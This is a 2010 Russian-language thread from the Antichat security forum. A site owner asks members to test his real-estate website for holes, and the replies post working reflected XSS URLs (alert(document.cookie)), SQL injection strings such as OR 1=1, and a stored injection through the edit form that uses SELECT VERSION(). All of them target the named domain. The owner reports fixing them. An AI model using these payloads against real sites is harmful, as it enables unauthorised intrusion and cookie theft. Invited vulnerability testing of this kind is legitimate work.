HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Проверка на разные уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проверка на разные уязвимости
  #1  
Старый 16.04.2010, 20:38
bazzjr
Новичок
Регистрация: 14.04.2010
Сообщений: 5
С нами: 8461335

Репутация: 1
По умолчанию Проверка на разные уязвимости
Всем госу взлома и тестов привет!

Ребята, пожалуйста проверте сайт http://norieltor.ru на разного рода уязвимости.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.04.2010, 03:20
bazzjr
Новичок
Регистрация: 14.04.2010
Сообщений: 5
С нами: 8461335

Репутация: 1
По умолчанию
что... совсем нет ошибок?
 
Ответить с цитированием

  #3  
Старый 19.04.2010, 03:44
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
С нами: 9112381

Репутация: 403
По умолчанию
уязвимо : ваше имя
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';">alert('XSS')','177','a4c0338947c01a38489d4e0e7 d45ad06','2010-04-19 03' at line 1

http://norieltor.ru/search/offer=1&p=3&city=7700000000000&o=2&r=1&ml=1&pl='>" ><script>alert(document.cookie)</script>

Что смог нашел.
Последний раз редактировалось Ruslan1817; 19.04.2010 в 03:51..
 
Ответить с цитированием

  #4  
Старый 19.04.2010, 16:48
bazzjr
Новичок
Регистрация: 14.04.2010
Сообщений: 5
С нами: 8461335

Репутация: 1
По умолчанию
спасибо поправим
 
Ответить с цитированием

  #5  
Старый 20.04.2010, 20:44
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
незнаю уязвимость или нет но по крайней мере ругается:
http://norieltor.ru/search/offer=1&p=3&o=2&r=4,3&c1=0&c2=0&s=1&v=1&page=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' and `komnati` IN (4,3) and UNIX_TIMESTAMP(datetime_post) > 1266424935 ORDER' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',3) and UNIX_TIMESTAMP(datetime_post) > 1266424951 ORDER BY `datetime_post` DES' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and UNIX_TIMESTAMP(datetime_post) > 1266424972 ORDER BY `datetime_post` DESC' at line 1

ругается вот этот вот кусочек:
&o=2&r=4,3
 
Ответить с цитированием

  #6  
Старый 20.04.2010, 22:15
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
Там sql-inj, а вы из слона делаете муху со своими xss и "ругается".

http://norieltor.ru/search/offer=1&p=3&o=2&r=-55)+OR+1=1+--+-3&c1=0&c2=0&s=1&v=1&page=1
 
Ответить с цитированием

  #7  
Старый 20.04.2010, 23:34
bazzjr
Новичок
Регистрация: 14.04.2010
Сообщений: 5
С нами: 8461335

Репутация: 1
По умолчанию
BlackSun и pinch спасибо, поправил уже.
 
Ответить с цитированием

  #8  
Старый 22.04.2010, 00:07
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
По умолчанию
Код:
http://norieltor.ru/search/offer=1&p=3&c1=&c2=9999999999%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Пассивка

Код:
http://norieltor.ru/search/offer=1&p=3&c1=9999999999%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c2=
Еще одна
Код:
http://norieltor.ru/search/offer=1&p=3%22%3E%3Cscript%3Ealert(%22HOLE%22)%3C/script%3E&c1=9999999999&c2=
Там же

Инъекция!!!
http://norieltor.ru/edit/ -редактируем своё сообщение
в цену вставляем: 200', `cena`=(SELECT VERSION()),`plita`='1. В цене получим покоцаную версию.
Инъекция есть во всех остальных полях!!!

Продолжим:
4)http://norieltor.ru/search/offer=1&f=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E
5)http://norieltor.ru/search/offer=1&v=2"<script>alert(document.cookie)</script>
6)http://norieltor.ru/search/offer=1&s=2%22%3Cscript%3Ealert(document.cookie)%3 C/script%3E
Последний раз редактировалось BlackSun; 22.04.2010 в 02:12..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Регеры ICQ UIN'ов by saiNT sai_NT Skype, IRC, ICQ, Jabber и другие IM 481 17.09.2010 17:58
Проверка на уязвимости Cайтов, Серверов, PHP кода. (Dm) Freelance - О Работе 0 05.09.2009 14:28
Проверка серверов, и вебсайтов на уязвимости NeitR1N0 Разное - Покупка, продажа, обмен 12 18.03.2006 16:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.